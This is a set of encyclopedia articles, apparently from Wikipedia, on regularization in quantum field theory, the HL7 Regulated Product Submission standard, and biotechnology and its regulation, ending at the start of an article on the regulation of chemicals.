Regularization: Classical physics theory breaks down at small scales, e.g., the difference between an electron and a point particle shown above. Addressing this problem requires new kinds of additional physical constraints. For instance, in this case, assuming a finite electron radius (i.e., regularizing the electron mass-energy) suffices to explain the system below a certain size. Similar regularization arguments work in other renormalization problems. For example, a theory may hold under one narrow set of conditions, but due to calculations involving infinities or singularities, it may break down under other conditions or scales. In the case of the electron, another way to avoid infinite mass-energy while retaining the point nature of the particle is to postulate tiny additional dimensions over which the particle could 'spread out' rather than restrict its motion solely over 3D space. This is precisely the motivation behind string theory and other multi-dimensional models including multiple time dimensions . Rather than assuming the existence of unknown new physics, renormalization, which assumes interactions between the particle and other surrounding particles in the environment, offers an alternative strategy to resolve infinities in such classical problems.
Specific types of regularization procedures include
Perturbative predictions by quantum field theory about quantum scattering of elementary particles , implied by a corresponding Lagrangian density, are computed using the Feynman rules , a regularization method to circumvent ultraviolet divergences so as to obtain finite results for Feynman diagrams containing loops, and a renormalization scheme. A regularization method results in regularized n-point Green's functions ( propagators ), and a suitable limiting procedure (a renormalization scheme) then leads to perturbative S-matrix elements. These are independent of the particular regularization method used, and enable one to model perturbatively the measurable physical processes (cross sections, probability amplitudes, decay widths and lifetimes of excited states). However, so far no known regularized n-point Green's functions can be regarded as being based on a physically realistic theory of quantum-scattering since the derivation of each disregards some of the basic tenets of conventional physics (e.g., by not being Lorentz-invariant , by introducing either unphysical particles with a negative metric or wrong statistics, or discrete space-time, or lowering the dimensionality of space-time, or some combination thereof). So the available regularization methods are understood as formalistic technical devices, devoid of any direct physical meaning. In addition, there are qualms about renormalization. For a history and comments on this more than half-a-century old open conceptual problem, see e.g. [ 3 ] [ 4 ] [ 5 ]
As it seems that the vertices of non-regularized Feynman series adequately describe interactions in quantum scattering, it is taken that their ultraviolet divergences are due to the asymptotic, high-energy behavior of the Feynman propagators. So it is a prudent, conservative approach to retain the vertices in Feynman series, and modify only the Feynman propagators to create a regularized Feynman series. This is the reasoning behind the formal Pauli–Villars covariant regularization by modification of Feynman propagators through auxiliary unphysical particles, cf. [ 6 ] and representation of physical reality by Feynman diagrams.
In 1949 Pauli conjectured there is a realistic regularization, which is implied by a theory that respects all the established principles of contemporary physics. [ 6 ] [ 7 ] So its propagators (i) do not need to be regularized, and (ii) can be regarded as such a regularization of the propagators used in quantum field theories that might reflect the underlying physics. The additional parameters of such a theory do not need to be removed (i.e. the theory needs no renormalization) and may provide some new information about the physics of quantum scattering, though they may turn out experimentally to be negligible. By contrast, any present regularization method introduces formal coefficients that must eventually be disposed of by renormalization.
Paul Dirac was persistently, extremely critical about procedures of renormalization. In 1963, he wrote, "… in the renormalization theory we have a theory that has defied all the attempts of the mathematician to make it sound. I am inclined to suspect that the renormalization theory is something that will not survive in the future,…" [ 8 ] He further observed that "One can distinguish between two main procedures for a theoretical physicist. One of them is to work from the experimental basis ... The other procedure is to work from the mathematical basis. One examines and criticizes the existing theory. One tries to pin-point the faults in it and then tries to remove them. The difficulty here is to remove the faults without destroying the very great successes of the existing theory." [ 9 ]
Abdus Salam remarked in 1972, "Field-theoretic infinities first encountered in Lorentz's computation of electron have persisted in classical electrodynamics for seventy and in quantum electrodynamics for some thirty-five years. These long years of frustration have left in the subject a curious affection for the infinities and a passionate belief that they are an inevitable part of nature; so much so that even the suggestion of a hope that they may after all be circumvented - and finite values for the renormalization constants computed - is considered irrational." [ 10 ] [ 11 ]
However, in Gerard ’t Hooft ’s opinion, "History tells us that if we hit upon some obstacle, even if it looks like a pure formality or just a technical complication, it should be carefully scrutinized. Nature might be telling us something, and we should find out what it is." [ 12 ]
The difficulty with a realistic regularization is that so far there is none, although nothing could be destroyed by its bottom-up approach; and there is no experimental basis for it.
Considering distinct theoretical problems, Dirac in 1963 suggested: "I believe separate ideas will be needed to solve these distinct problems and that they will be solved one at a time through successive stages in the future evolution of physics. At this point I find myself in disagreement with most physicists. They are inclined to think one master idea will be discovered that will solve all these problems together. I think it is asking too much to hope that anyone will be able to solve all these problems together. One should separate them one from another as much as possible and try to tackle them separately. And I believe the future development of physics will consist of solving them one at a time, and that after any one of them has been solved there will still be a great mystery about how to attack further ones." [ 8 ]
According to Dirac, " Quantum electrodynamics is the domain of physics that we know most about, and presumably it will have to be put in order before we can hope to make any fundamental progress with other field theories, although these will continue to develop on the experimental basis." [ 9 ]
Dirac’s two preceding remarks suggest that we should start searching for a realistic regularization in the case of quantum electrodynamics (QED) in the four-dimensional Minkowski spacetime , starting with the original QED Lagrangian density. [ 8 ] [ 9 ]
The path-integral formulation provides the most direct way from the Lagrangian density to the corresponding Feynman series in its Lorentz-invariant form. [ 5 ] The free-field part of the Lagrangian density determines the Feynman propagators, whereas the rest determines the vertices. As the QED vertices are considered to adequately describe interactions in QED scattering, it makes sense to modify only the free-field part of the Lagrangian density so as to obtain such regularized Feynman series that the Lehmann–Symanzik–Zimmermann reduction formula provides a perturbative S-matrix that: (i) is Lorentz-invariant and unitary; (ii) involves only the QED particles; (iii) depends solely on QED parameters and those introduced by the modification of the Feynman propagators—for particular values of these parameters it is equal to the QED perturbative S-matrix; and (iv) exhibits the same symmetries as the QED perturbative S-matrix. Let us refer to such a regularization as the minimal realistic regularization , and start searching for the corresponding, modified free-field parts of the QED Lagrangian density.
According to Bjorken and Drell , it would make physical sense to sidestep ultraviolet divergences by using more detailed description than can be provided by differential field equations. And Feynman noted about the use of differential equations: "... for neutron diffusion it is only an approximation that is good when the distance over which we are looking is large compared with the mean free path. If we looked more closely, we would see individual neutrons running around." And then he wondered, "Could it be that the real world consists of little X-ons which can be seen only at very tiny distances? And that in our measurements we are always observing on such a large scale that we can’t see these little X-ons, and that is why we get the differential equations? ... Are they [therefore] also correct only as a smoothed-out imitation of a really much more complicated microscopic world?" [ 13 ]
Already in 1938, Heisenberg [ 14 ] proposed that a quantum field theory can provide only an idealized, large-scale description of quantum dynamics, valid for distances larger than some fundamental length , expected also by Bjorken and Drell in 1965 . Feynman's preceding remark provides a possible physical reason for its existence; either that or it is just another way of saying the same thing (there is a fundamental unit of distance) but having no new information.
The need for regularization terms in any quantum field theory of quantum gravity is a major motivation for physics beyond the standard model . Infinities of the non-gravitational forces in QFT can be controlled via renormalization only, but additional regularization (and hence new physics) is required uniquely for gravity. The regularizers model, and work around, the breakdown of QFT at small scales and thus show clearly the need for some other theory to come into play beyond QFT at these scales. A. Zee (Quantum Field Theory in a Nutshell, 2003) considers this to be a benefit of the regularization framework—theories can work well in their intended domains but also contain information about their own limitations and point clearly to where new physics is needed. | https://en.wikipedia.org/wiki/Regularization_(physics) |
Regulated Product Submission (RPS) is a Health Level Seven (HL7) standard designed to facilitate the processing and review of regulated product information. [ 1 ] RPS is being developed in response to performance goals that the U.S. Food and Drug Administration (FDA) is to achieve by 2012, as outlined in the Prescription Drug User Fee Act (PDUFA). [ 2 ] In addition to the U.S., regulatory agencies from Europe , Canada , and Japan are at varying levels of interest and participation. [ 2 ] Currently, the second release of RPS is in development. [ 2 ]
Authorities such as the FDA receive numerous submissions that address a variety of regulatory issues. The information contained in these submissions is divided into large numbers of files, both paper and electronic. Often, files in one submission are related to files in earlier submissions. Because the information is divided into numerous files sent over time, it can be difficult to efficiently process and review the information.
While the general data layouts of all regulated products are the same, different product types have different lists of topics that must be addressed within the submission. Therefore, the goal of RPS is to create an HL7 XML message standard for submitting information to regulatory authorities. [ 3 ] Each message includes the contents of a regulatory submission plus information such as metadata , which is necessary to process submissions. [ 4 ] The Refined Message Information Model (R-MIM) shows the structure of a message as a color-coded diagram. R-MIM diagrams are designed to capture all required information for the efficient processing and review of regulatory submissions and to explain what each message consists of. This makes RPS general enough to handle all regulated products while containing enough information to allow regulators to support structured review. [ 4 ]
The project to develop a regulated product submission standard was initiated on June 22, 2005. [ 4 ] Release 1 was spearheaded by Jason Rock of GlobalSubmit, with the aim of creating one standardized submission format to support all of the FDA's electronic product submissions. The Health Level 7 message was created by leveraging existing human pharmaceutical experience, such as The International Conference on Harmonisation of Technical Requirements for Registration of Pharmaceuticals for Human Use (ICH). [ 4 ] RPS Release 1 provides the capability to cross-reference previously submitted material owned by the sponsor as well as append, replace and delete parts of the document lifecycle. [ 5 ] Release 2, led by Peggy Leizear of the Office of Planning at the FDA, grants the ability to exchange contact information, classify submission content and handle multi-region submissions. [ 5 ] The second release of RPS also handles two-way communication—The regulatory authority (e.g. FDA) will use RPS to send correspondence (e.g. request for additional information, meeting minutes, application approval) to the submitter. [ 5 ]
As the industry moves away from paper submissions, global companies producing regulated products will benefit from having a published electronic submission standard. The label of “regulated product” applies not only to pharmaceuticals, but also extends to include food additives, medical devices and radiologics, human therapeutics, biologics, tobacco products and veterinary products. [ 2 ]
The submitted information is structured as a collection of documents, organized by report sections. Multiple documents can be assigned to a single report section. The actual table of required and optional report sections varies from product to product and is defined by regulatory authorities. Since the same information can be submitted to support multiple applications, it is imperative that RPS allow for the reuse of data between applications.
RPS is in many ways comparable to the electronic Common Technical Document . [ 4 ] Ideally, the FDA would like to implement RPS as the next iteration of eCTD.
The idea behind RPS and ICH’s eCTD is the same—the use of a standardized format for regulatory submissions, including PDF documents and SAS datasets. [ 2 ] Although document contents are the same for eCTD and RPS, the internal XML structures are very different. [ 2 ] RPS will offer two obvious advantages over eCTD. First, RPS will establish two-way communication between the submitter and all FDA-regulated product centers within the agency. [ 2 ] Second, RPS will manage the life cycle of submissions by allowing cross-referencing of previously submitted information. [ 2 ] This means that for electronic Investigational New Drug (IND) applications, New Drug Applications (NDA), and Biologic License Applications (BLAs), information need only be submitted once and previously submitted electronic documents can be applied to marketing applications. [ 2 ] With RPS, archived electronic IND, NDA, and BLA submissions will be retrievable through standardized automated links. [ 2 ] eCTD lacks this cross-referencing capability. [ 2 ]
Release 3 will be headed by ICH. The goal of release three is to have more international requirements. The HL7 standard will be implemented first at the Center for Drug Evaluation and Research (CDER) and Center for Biologics Evaluation and Research (CBER) in late 2011, before being rolled out to the other centers using a yet-to-be-determined schedule. Both centers will implement Release 2 of RPS, which barely passed ballot as a Draft Standard for Trial Use (DSTU) in January 2010. [ 6 ] The ballot passed by two votes with a result of 53 affirmative and 33 negative. [ 6 ] Testing by FDA is expected to begin at the beginning of the third quarter, 2010. [ 6 ] When RPS is implemented, FDA will offer a training program for reviewers, including hands-on training classes. [ 2 ] | https://en.wikipedia.org/wiki/Regulated_Product_Submissions |
Biotechnology is a multidisciplinary field that involves the integration of natural sciences and engineering sciences in order to achieve the application of organisms and parts thereof for products and services. [ 1 ] Specialists in the field are known as biotechnologists .
The term biotechnology was first used by Károly Ereky in 1919 [ 2 ] to refer to the production of products from raw materials with the aid of living organisms. The core principle of biotechnology involves harnessing biological systems and organisms, such as bacteria, yeast , and plants, to perform specific tasks or produce valuable substances.
Biotechnology has had a significant impact on many areas of society, from medicine to agriculture to environmental science . One of the key techniques used in biotechnology is genetic engineering , which allows scientists to modify the genetic makeup of organisms to achieve desired outcomes. This can involve inserting genes from one organism into another, thereby creating new traits or modifying existing ones. [ 3 ]
Other important techniques used in biotechnology include tissue culture, which allows researchers to grow cells and tissues in the lab for research and medical purposes, and fermentation , which is used to produce a wide range of products such as beer, wine, and cheese.
The applications of biotechnology are diverse and have led to the development of products like life-saving drugs, biofuels , genetically modified crops, and innovative materials. [ 4 ] It has also been used to address environmental challenges, such as developing biodegradable plastics and using microorganisms to clean up contaminated sites.
Biotechnology is a rapidly evolving field with significant potential to address pressing global challenges and improve the quality of life for people around the world; however, despite its numerous benefits, it also poses ethical and societal challenges, such as questions around genetic modification and intellectual property rights . As a result, there is ongoing debate and regulation surrounding the use and application of biotechnology in various industries and fields. [ 5 ]
The concept of biotechnology encompasses a wide range of procedures for modifying living organisms for human purposes, going back to domestication of animals, cultivation of plants, and "improvements" to these through breeding programs that employ artificial selection and hybridization . Modern usage also includes genetic engineering, as well as cell and tissue culture technologies. The American Chemical Society defines biotechnology as the application of biological organisms, systems, or processes by various industries to learning about the science of life and the improvement of the value of materials and organisms, such as pharmaceuticals, crops, and livestock . [ 6 ] As per the European Federation of Biotechnology , biotechnology is the integration of natural science and organisms, cells, parts thereof, and molecular analogues for products and services. [ 7 ] Biotechnology is based on the basic biological sciences (e.g., molecular biology , biochemistry , cell biology , embryology , genetics , microbiology ) and conversely provides methods to support and perform basic research in biology. [ citation needed ]
Biotechnology is laboratory research and development, supported by bioinformatics , for the exploration, extraction, exploitation, and production of products from living organisms and from any source of biomass by means of biochemical engineering . High value-added products can be planned (reproduced by biosynthesis , for example), forecast, formulated, developed, manufactured, and marketed for the purpose of sustainable operations (providing a return on the large initial investment in R & D) and of gaining durable patent rights (exclusive rights for sales, which first require national and international approval based on the results of animal and human experiments, especially in the pharmaceutical branch of biotechnology, to prevent any undetected side-effects or safety concerns arising from the products). [ 8 ] [ 9 ] [ 10 ] The utilization of biological processes, organisms or systems to produce products that are anticipated to improve human lives is termed biotechnology. [ 11 ]
By contrast, bioengineering is generally thought of as a related field that more heavily emphasizes higher systems approaches (not necessarily the altering or using of biological materials directly ) for interfacing with and utilizing living things. Bioengineering is the application of the principles of engineering and natural sciences to tissues, cells, and molecules. This can be considered as the use of knowledge from working with and manipulating biology to achieve a result that can improve functions in plants and animals. [ 12 ] Relatedly, biomedical engineering is an overlapping field that often draws upon and applies biotechnology (by various definitions), especially in certain sub-fields of biomedical or chemical engineering such as tissue engineering , biopharmaceutical engineering , and genetic engineering . [ citation needed ]
Although not normally what first comes to mind, many forms of human-derived agriculture clearly fit the broad definition of "utilizing a biotechnological system to make products". Indeed, the cultivation of plants may be viewed as the earliest biotechnological enterprise. [ citation needed ]
Agriculture has been theorized to have become the dominant way of producing food since the Neolithic Revolution . Through early biotechnology, the earliest farmers selected and bred the best-suited crops (e.g., those with the highest yields) to produce enough food to support a growing population. As crops and fields became increasingly large and difficult to maintain, it was discovered that specific organisms and their by-products could effectively fertilize , restore nitrogen , and control pests . Throughout the history of agriculture, farmers have inadvertently altered the genetics of their crops through introducing them to new environments and breeding them with other plants — one of the first forms of biotechnology. [ clarification needed ]
These processes also were included in early fermentation of beer . [ 13 ] These processes were introduced in early Mesopotamia , Egypt , China and India , and still use the same basic biological methods. In brewing , malted grains (containing enzymes ) convert starch from grains into sugar, and specific yeasts are then added to produce beer. In this process, carbohydrates in the grains break down into alcohols, such as ethanol. Later, other cultures produced the process of lactic acid fermentation , which produced other preserved foods, such as soy sauce . Fermentation was also used in this time period to produce leavened bread . Although the process of fermentation was not fully understood until Louis Pasteur 's work in 1857, it is still the first use of biotechnology to convert a food source into another form. [ citation needed ]
Before the time of Charles Darwin 's work and life, animal and plant scientists had already used selective breeding. Darwin added to that body of work with his scientific observations about the ability of science to change species. These accounts contributed to Darwin's theory of natural selection. [ 14 ]
For thousands of years, humans have used selective breeding to improve the production of crops and livestock to use them for food. In selective breeding, organisms with desirable characteristics are mated to produce offspring with the same characteristics. For example, this technique was used with corn to produce the largest and sweetest crops. [ 15 ]
In the early twentieth century scientists gained a greater understanding of microbiology and explored ways of manufacturing specific products. In 1917, Chaim Weizmann first used a pure microbiological culture in an industrial process, employing Clostridium acetobutylicum to convert corn starch into acetone , which the United Kingdom desperately needed to manufacture explosives during World War I . [ 16 ]
Biotechnology has also led to the development of antibiotics. In 1928, Alexander Fleming discovered the mold Penicillium . His work led to the purification of the antibiotic formed by the mold by Howard Florey , Ernst Boris Chain and Norman Heatley – to form what we today know as penicillin . In 1940, penicillin became available for medicinal use to treat bacterial infections in humans. [ 15 ]
The field of modern biotechnology is generally thought of as having been born in 1971 when Paul Berg's (Stanford) experiments in gene splicing had early success. Herbert W. Boyer (Univ. Calif. at San Francisco) and Stanley N. Cohen (Stanford) significantly advanced the new technology in 1972 by transferring genetic material into a bacterium, such that the imported material would be reproduced. The commercial viability of a biotechnology industry was significantly expanded on June 16, 1980, when the United States Supreme Court ruled that a genetically modified microorganism could be patented in the case of Diamond v. Chakrabarty . [ 17 ] Indian-born Ananda Chakrabarty , working for General Electric , had modified a bacterium (of the genus Pseudomonas ) capable of breaking down crude oil, which he proposed to use in treating oil spills. (Chakrabarty's work did not involve gene manipulation but rather the transfer of entire organelles between strains of the Pseudomonas bacterium). [ citation needed ]
The MOSFET was invented at Bell Labs between 1955 and 1960. [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] Two years later, in 1962, Leland C. Clark and Champ Lyons invented the first biosensor. [ 24 ] [ 25 ] Biosensor MOSFETs were later developed, and they have since been widely used to measure physical , chemical , biological and environmental parameters. [ 26 ] The first BioFET was the ion-sensitive field-effect transistor (ISFET), invented by Piet Bergveld in 1970. [ 27 ] [ 28 ] It is a special type of MOSFET, [ 26 ] where the metal gate is replaced by an ion -sensitive membrane , electrolyte solution and reference electrode . [ 29 ] The ISFET is widely used in biomedical applications, such as the detection of DNA hybridization , biomarker detection from blood , antibody detection, glucose measurement, pH sensing, and genetic technology . [ 29 ]
By the mid-1980s, other BioFETs had been developed, including the gas sensor FET (GASFET), pressure sensor FET (PRESSFET), chemical field-effect transistor (ChemFET), reference ISFET (REFET), enzyme-modified FET (ENFET) and immunologically modified FET (IMFET). [ 26 ] By the early 2000s, BioFETs such as the DNA field-effect transistor (DNAFET), gene-modified FET (GenFET) and cell-potential BioFET (CPFET) had been developed. [ 29 ]
A factor influencing the biotechnology sector's success is improved intellectual property rights legislation—and enforcement—worldwide, as well as strengthened demand for medical and pharmaceutical products. [ 30 ]
Rising demand for biofuels is expected to be good news for the biotechnology sector, with the Department of Energy estimating ethanol usage could reduce U.S. petroleum-derived fuel consumption by up to 30% by 2030. The biotechnology sector has allowed the U.S. farming industry to rapidly increase its supply of corn and soybeans—the main inputs into biofuels—by developing genetically modified seeds that resist pests and drought. By increasing farm productivity, biotechnology boosts biofuel production. [ 31 ]
Biotechnology has applications in four major industrial areas, including health care (medical), crop production and agriculture, non-food (industrial) uses of crops and other products (e.g., biodegradable plastics , vegetable oil , biofuels ), and environmental uses. [ 32 ]
For example, one application of biotechnology is the directed use of microorganisms for the manufacture of organic products (examples include beer and milk products). Another example is using naturally present bacteria by the mining industry in bioleaching . [ citation needed ] Biotechnology is also used to recycle, treat waste, clean up sites contaminated by industrial activities ( bioremediation ), and also to produce biological weapons .
A series of derived terms have been coined to identify several branches of biotechnology, for example:
In medicine, modern biotechnology has many applications in areas such as pharmaceutical drug discovery and production, pharmacogenomics , and genetic testing (or genetic screening ). In 2021, nearly 40% of the total company value of pharmaceutical biotech companies worldwide was attributable to companies active in oncology, with neurology and rare diseases being the other two major application areas. [ 43 ]
Pharmacogenomics (a combination of pharmacology and genomics ) is the technology that analyses how genetic makeup affects an individual's response to drugs. [ 44 ] Researchers in the field investigate the influence of genetic variation on drug responses in patients by correlating gene expression or single-nucleotide polymorphisms with a drug's efficacy or toxicity . [ 45 ] The purpose of pharmacogenomics is to develop rational means to optimize drug therapy, with respect to the patients' genotype , to ensure maximum efficacy with minimal adverse effects . [ 46 ] Such approaches promise the advent of " personalized medicine "; in which drugs and drug combinations are optimized for each individual's unique genetic makeup. [ 47 ] [ 48 ]
Biotechnology has contributed to the discovery and manufacturing of traditional small molecule pharmaceutical drugs as well as drugs that are the product of biotechnology – biopharmaceutics . Modern biotechnology can be used to manufacture existing medicines relatively easily and cheaply. The first genetically engineered products were medicines designed to treat human diseases. To cite one example, in 1978 Genentech developed synthetic humanized insulin by joining its gene with a plasmid vector inserted into the bacterium Escherichia coli . Insulin, widely used for the treatment of diabetes, was previously extracted from the pancreas of abattoir animals (cattle or pigs). The genetically engineered bacteria are able to produce large quantities of synthetic human insulin at relatively low cost. [ 49 ] [ 50 ] Biotechnology has also enabled emerging therapeutics like gene therapy . The application of biotechnology to basic science (for example through the Human Genome Project ) has also dramatically improved our understanding of biology and as our scientific knowledge of normal and disease biology has increased, our ability to develop new medicines to treat previously untreatable diseases has increased as well. [ 50 ]
Genetic testing allows the genetic diagnosis of vulnerabilities to inherited diseases , and can also be used to determine a child's parentage (genetic mother and father) or in general a person's ancestry . In addition to studying chromosomes to the level of individual genes, genetic testing in a broader sense includes biochemical tests for the possible presence of genetic diseases, or mutant forms of genes associated with increased risk of developing genetic disorders. Genetic testing identifies changes in chromosomes , genes, or proteins. [ 51 ] Most of the time, testing is used to find changes that are associated with inherited disorders. The results of a genetic test can confirm or rule out a suspected genetic condition or help determine a person's chance of developing or passing on a genetic disorder . As of 2011 several hundred genetic tests were in use. [ 52 ] [ 53 ] Since genetic testing may open up ethical or psychological problems, genetic testing is often accompanied by genetic counseling .
Genetically modified crops ("GM crops", or "biotech crops") are plants used in agriculture , the DNA of which has been modified with genetic engineering techniques. In most cases, the main aim is to introduce a new trait that does not occur naturally in the species. Biotechnology firms can contribute to future food security by improving the nutrition and viability of urban agriculture. Furthermore, the protection of intellectual property rights encourages private sector investment in agrobiotechnology. [ citation needed ]
Examples in food crops include resistance to certain pests, [ 54 ] diseases, [ 55 ] stressful environmental conditions, [ 56 ] resistance to chemical treatments (e.g. resistance to a herbicide [ 57 ] ), reduction of spoilage, [ 58 ] or improving the nutrient profile of the crop. [ 59 ] Examples in non-food crops include production of pharmaceutical agents , [ 60 ] biofuels , [ 61 ] and other industrially useful goods, [ 62 ] as well as for bioremediation . [ 63 ] [ 64 ]
Farmers have widely adopted GM technology. Between 1996 and 2011, the total surface area of land cultivated with GM crops had increased by a factor of 94, from 17,000 to 1,600,000 square kilometers (4,200,000 to 395,400,000 acres). [ 65 ] 10% of the world's crop lands were planted with GM crops in 2010. [ 65 ] As of 2011, 11 different transgenic crops were grown commercially on 395 million acres (160 million hectares) in 29 countries such as the US, Brazil , Argentina , India , Canada, China, Paraguay, Pakistan, South Africa, Uruguay, Bolivia, Australia, Philippines, Myanmar, Burkina Faso, Mexico and Spain. [ 65 ]
Genetically modified foods are foods produced from organisms that have had specific changes introduced into their DNA with the methods of genetic engineering . These techniques have allowed for the introduction of new crop traits as well as a far greater control over a food's genetic structure than previously afforded by methods such as selective breeding and mutation breeding . [ 66 ] Commercial sale of genetically modified foods began in 1994, when Calgene first marketed its Flavr Savr delayed ripening tomato. [ 67 ] To date, genetic modification of foods has primarily focused on cash crops in high demand by farmers, such as soybean , corn , canola , and cotton seed oil . These have been engineered for resistance to pathogens and herbicides and better nutrient profiles. GM livestock have also been experimentally developed; in November 2013 none were available on the market, [ 68 ] but in 2015 the FDA approved the first GM salmon for commercial production and consumption. [ 69 ]
There is a scientific consensus [ 70 ] [ 71 ] [ 72 ] [ 73 ] that currently available food derived from GM crops poses no greater risk to human health than conventional food, [ 74 ] [ 75 ] [ 76 ] [ 77 ] [ 78 ] but that each GM food needs to be tested on a case-by-case basis before introduction. [ 79 ] [ 80 ] [ 81 ] Nonetheless, members of the public are much less likely than scientists to perceive GM foods as safe. [ 82 ] [ 83 ] [ 84 ] [ 85 ] The legal and regulatory status of GM foods varies by country, with some nations banning or restricting them, and others permitting them with widely differing degrees of regulation. [ 86 ] [ 87 ] [ 88 ] [ 89 ]
GM crops also provide a number of ecological benefits, if not used in excess. [ 90 ] Insect-resistant crops have proven to lower pesticide usage, therefore reducing the environmental impact of pesticides as a whole. [ 91 ] However, opponents have objected to GM crops per se on several grounds, including environmental concerns, whether food produced from GM crops is safe, whether GM crops are needed to address the world's food needs, and economic concerns raised by the fact these organisms are subject to intellectual property law.
Biotechnology has several applications in the realm of food security. Crops like Golden rice are engineered to have higher nutritional content, and there is potential for food products with longer shelf lives. [ 92 ] Though not a form of agricultural biotechnology, vaccines can help prevent diseases found in animal agriculture. Additionally, agricultural biotechnology can expedite breeding processes in order to yield faster results and provide greater quantities of food. [ 93 ] Transgenic biofortification in cereals has been considered as a promising method to combat malnutrition in India and other countries. [ 94 ]
Industrial biotechnology (known mainly in Europe as white biotechnology) is the application of biotechnology for industrial purposes, including industrial fermentation . It includes the practice of using cells such as microorganisms , or components of cells like enzymes , to generate industrially useful products in sectors such as chemicals, food and feed, detergents, paper and pulp, textiles and biofuels . [ 95 ] In recent decades, significant progress has been made in creating genetically modified organisms (GMOs) that enhance the diversity of applications and the economic viability of industrial biotechnology. By using renewable raw materials to produce a variety of chemicals and fuels, industrial biotechnology is actively advancing towards lowering greenhouse gas emissions and moving away from a petrochemical-based economy. [ 96 ]
Synthetic biology is considered one of the essential cornerstones of industrial biotechnology due to its economic and sustainability contributions to the manufacturing sector. Together, biotechnology and synthetic biology play a crucial role in generating cost-effective, environmentally friendlier products by using bio-based rather than fossil-based production. [ 97 ] Synthetic biology can be used to engineer model microorganisms , such as Escherichia coli , with genome editing tools to enhance their ability to produce bio-based products, such as medicines and biofuels . [ 98 ] For instance, E. coli and Saccharomyces cerevisiae in a consortium could be used as industrial microbes to produce precursors of the chemotherapeutic agent paclitaxel by applying metabolic engineering in a co-culture approach that exploits the strengths of both microbes. [ 99 ]
Another example of synthetic biology applications in industrial biotechnology is the re-engineering of the metabolic pathways of E. coli by CRISPR and CRISPRi systems toward the production of a chemical known as 1,4-butanediol , which is used in fiber manufacturing. To produce 1,4-butanediol, the authors altered the metabolic regulation of E. coli with CRISPR, introducing a point mutation in the gltA gene, knocking out the sad gene, and knocking in six genes ( cat1 , sucD , 4hbd , cat2 , bld , and bdh ), while the CRISPRi system was used to knock down three competing genes ( gabD , ybgC , and tesB ) that affect the biosynthesis pathway of 1,4-butanediol. Consequently, the yield of 1,4-butanediol increased significantly, from 0.9 to 1.8 g/L. [ 100 ]
Environmental biotechnology includes various disciplines that play an essential role in reducing environmental waste and providing environmentally safe processes, such as biofiltration and biodegradation . [ 101 ] [ 102 ] The environment can be affected by biotechnologies, both positively and adversely. Vallero and others have argued that the difference between beneficial biotechnology (e.g., bioremediation to clean up an oil spill or hazardous chemical leak) versus the adverse effects stemming from biotechnological enterprises (e.g., flow of genetic material from transgenic organisms into wild strains) can be seen as applications and implications, respectively. [ 103 ] Cleaning up environmental wastes is an example of an application of environmental biotechnology ; whereas loss of biodiversity or loss of containment of a harmful microbe are examples of environmental implications of biotechnology. [ citation needed ]
Many cities have installed CityTrees , which use biotechnology to filter pollutants from urban atmospheres. [ 104 ]
The regulation of genetic engineering concerns approaches taken by governments to assess and manage the risks associated with the use of genetic engineering technology, and the development and release of genetically modified organisms (GMO), including genetically modified crops and genetically modified fish . There are differences in the regulation of GMOs between countries, with some of the most marked differences occurring between the US and Europe. [ 105 ] [ 106 ] Regulation varies in a given country depending on the intended use of the products of the genetic engineering. For example, a crop not intended for food use is generally not reviewed by authorities responsible for food safety. [ 107 ] The European Union differentiates between approval for cultivation within the EU and approval for import and processing. While only a few GMOs have been approved for cultivation in the EU, a number of GMOs have been approved for import and processing. [ 108 ] The cultivation of GMOs has triggered a debate about the coexistence of GM and non-GM crops. Depending on the coexistence regulations, incentives for the cultivation of GM crops differ. [ 109 ]
The EUginius (European GMO Initiative for a Unified Database System) database is intended to help companies, interested private users and competent authorities to find precise information on the presence, detection and identification of GMOs used in the European Union . The information is provided in English. [ citation needed ]
In 1988, after prompting from the United States Congress , the National Institute of General Medical Sciences ( National Institutes of Health ) (NIGMS) instituted a funding mechanism for biotechnology training. Universities nationwide compete for these funds to establish Biotechnology Training Programs (BTPs). Each successful application is generally funded for five years then must be competitively renewed. Graduate students in turn compete for acceptance into a BTP; if accepted, then stipend, tuition and health insurance support are provided for two or three years during the course of their PhD thesis work. Nineteen institutions offer NIGMS supported BTPs. [ 110 ] Biotechnology training is also offered at the undergraduate level and in community colleges. [ citation needed ]
But see also:
Domingo, José L.; Bordonaba, Jordi Giné (2011). "A literature review on the safety assessment of genetically modified plants" (PDF) . Environment International . 37 (4): 734– 742. Bibcode : 2011EnInt..37..734D . doi : 10.1016/j.envint.2011.01.003 . PMID 21296423 . Archived (PDF) from the original on October 9, 2022. In spite of this, the number of studies specifically focused on safety assessment of GM plants is still limited. However, it is important to remark that for the first time, a certain equilibrium in the number of research groups suggesting, on the basis of their studies, that a number of varieties of GM products (mainly maize and soybeans) are as safe and nutritious as the respective conventional non-GM plant, and those raising still serious concerns, was observed. Moreover, it is worth mentioning that most of the studies demonstrating that GM foods are as nutritional and safe as those obtained by conventional breeding, have been performed by biotechnology companies or associates, which are also responsible of commercializing these GM plants. Anyhow, this represents a notable advance in comparison with the lack of studies published in recent years in scientific journals by those companies.
Krimsky, Sheldon (2015). "An Illusory Consensus behind GMO Health Assessment". Science, Technology, & Human Values . 40 (6): 883– 914. doi : 10.1177/0162243915598381 . S2CID 40855100 . I began this article with the testimonials from respected scientists that there is literally no scientific controversy over the health effects of GMOs. My investigation into the scientific literature tells another story.
And contrast:
Panchin, Alexander Y.; Tuzhikov, Alexander I. (January 14, 2016). "Published GMO studies find no evidence of harm when corrected for multiple comparisons". Critical Reviews in Biotechnology . 37 (2): 213– 217. doi : 10.3109/07388551.2015.1130684 . ISSN 0738-8551 . PMID 26767435 . S2CID 11786594 . Here, we show that a number of articles some of which have strongly and negatively influenced the public opinion on GM crops and even provoked political actions, such as GMO embargo, share common flaws in the statistical evaluation of the data. Having accounted for these flaws, we conclude that the data presented in these articles does not provide any substantial evidence of GMO harm. The presented articles suggesting possible harm of GMOs received high public attention. However, despite their claims, they actually weaken the evidence for the harm and lack of substantial equivalency of studied GMOs. We emphasize that with over 1783 published articles on GMOs over the last 10 years it is expected that some of them should have reported undesired differences between GMOs and conventional crops even if no such differences exist in reality.
and | https://en.wikipedia.org/wiki/Regulation_of_biotechnologies |
The regulation of chemicals is the legislative intent of a variety of national laws or international initiatives such as agreements, strategies or conventions . These international initiatives define the policy of further regulations to be implemented locally as well as exposure or emission limits. Often, regulatory agencies oversee the enforcement of these laws.
Chemicals are regulated for:
